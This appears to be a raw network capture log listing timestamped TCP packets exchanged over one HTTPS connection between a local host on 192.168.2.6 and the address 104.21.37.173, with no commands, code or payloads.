                                                                      Dec 24, 2024 08:29:12.406843901 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.410804033 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.410878897 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.410906076 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.410989046 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.414014101 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.414099932 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.432651043 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.432730913 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.433509111 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.433633089 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.433648109 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.447968960 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.448046923 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.448061943 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.448162079 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.448972940 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.449203014 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.450747013 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.451127052 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.458106995 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.458189964 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.459027052 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.459269047 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.460783005 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.460851908 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.532591105 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.532721996 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.533984900 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.534265995 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.534296989 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.536201000 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.536820889 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.536993027 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.539648056 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.539725065 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.540910006 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.541003942 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.550288916 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.550309896 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.550348997 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.550371885 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.550393105 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.550430059 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.550462008 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.557081938 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.557133913 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.557173967 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.557189941 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.557221889 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.559748888 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.559880972 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.559897900 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.561069012 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.561187029 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.561201096 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.563628912 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.563947916 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.563980103 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.564948082 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.565165997 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.565180063 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.567676067 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.567744970 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.567759037 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.570332050 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.570431948 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.570451021 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.571732044 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.572146893 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.572160959 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.573018074 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.573349953 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.573364019 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.581474066 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.581515074 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.581552982 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.581568956 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.581599951 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.583456993 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.583606958 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.583621025 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.614418030 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.614479065 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.614516020 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.615767002 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.615883112 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.615900040 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.638392925 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.638462067 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.638478994 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.639300108 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.639363050 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.639377117 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.640173912 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.640239954 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.640254021 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.688323021 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.688370943 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.722506046 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.722580910 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.722604990 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.722714901 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.722815037 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.722877026 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.723570108 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.723619938 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.724525928 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.724581957 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.725516081 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.725581884 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.726643085 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.726872921 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.727480888 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.727562904 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.728414059 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.728471041 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.729363918 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.729428053 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.730264902 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.730320930 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.731261969 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.731338978 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.732204914 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.732273102 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.733989000 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.734051943 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.734966040 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.735022068 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.735901117 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.735949039 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.738745928 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.738816977 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.741601944 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.741739035 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.742575884 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.743602991 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.743660927 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.743678093 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.743733883 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.744496107 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.744550943 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.745469093 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.745579004 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.746434927 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.746488094 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.747380018 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.747445107 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.748339891 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.748399019 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.749186993 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.749243975 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.751081944 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.751250029 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.751646042 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.751698971 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.752563000 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.752624035 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.753463984 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.753524065 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.754519939 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.754584074 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.755435944 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.755556107 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.759134054 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.759205103 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.759269953 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.760977983 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.761032104 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.761048079 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.761158943 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.761930943 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.762006044 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.806183100 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.806305885 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.806571960 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.806622028 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.828593016 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.828663111 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.829245090 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.829299927 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.830205917 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.830265999 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.831227064 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.831283092 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.832113981 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.832221031 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.834048986 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.834103107 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.914704084 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.914767981 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.915117979 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.915164948 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.915869951 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.915919065 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.916728020 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.916780949 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.918442965 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.918550014 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.919383049 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.919493914 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.920402050 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.920455933 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.921405077 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.921469927 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.923166037 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.923216105 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.924053907 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.924103022 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.924936056 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.924990892 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.925950050 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.926107883 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.926929951 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.926984072 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.927879095 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.927931070 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.928777933 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.928823948 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.929701090 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.929757118 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.930553913 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.931579113 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.931636095 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.931649923 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.931691885 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.932387114 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.933469057 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.933512926 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.933522940 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.935200930 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.935328960 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.935332060 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.935347080 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.935375929 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.938082933 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.938117981 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.938137054 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.938152075 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.938183069 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.939048052 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.939202070 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.939217091 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.941920996 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.941979885 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.941994905 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.942049026 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.942784071 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.942838907 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.943613052 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.945024014 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.945070028 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.945086002 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.945152998 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.945947886 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.945996046 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.946930885 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.947000027 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.947845936 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.947896957 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.948744059 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.948798895 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.949744940 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.949803114 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.950778008 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.950831890 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.951540947 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.952676058 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.952727079 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.952755928 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.952805042 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.953427076 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.999141932 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.999212980 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.999280930 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.000060081 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.000111103 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.000128984 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.000230074 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.020756960 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.020886898 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.021375895 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.021426916 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.022247076 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.022305965 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.023178101 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.023235083 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.024157047 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.024210930 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.109386921 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.109456062 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.110189915 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.110253096 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.111478090 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.111540079 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.112459898 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.112514019 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.114198923 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.114264011 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.116030931 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.116075993 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.117248058 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.117306948 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.118774891 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.118834019 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.119827986 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.119887114 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.121495962 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.121551991 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.122544050 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.122596025 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.124368906 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.124427080 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.126065016 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.126131058 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.127110004 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.127163887 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.128834009 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.128890991 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.129861116 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.129911900 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.131685972 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.131743908 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.132592916 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.132643938 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.138420105 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.138451099 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.138485909 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.138505936 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.138540030 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.138562918 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:13.144901037 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:13.144922018 CET44349719104.21.37.173192.168.2.6
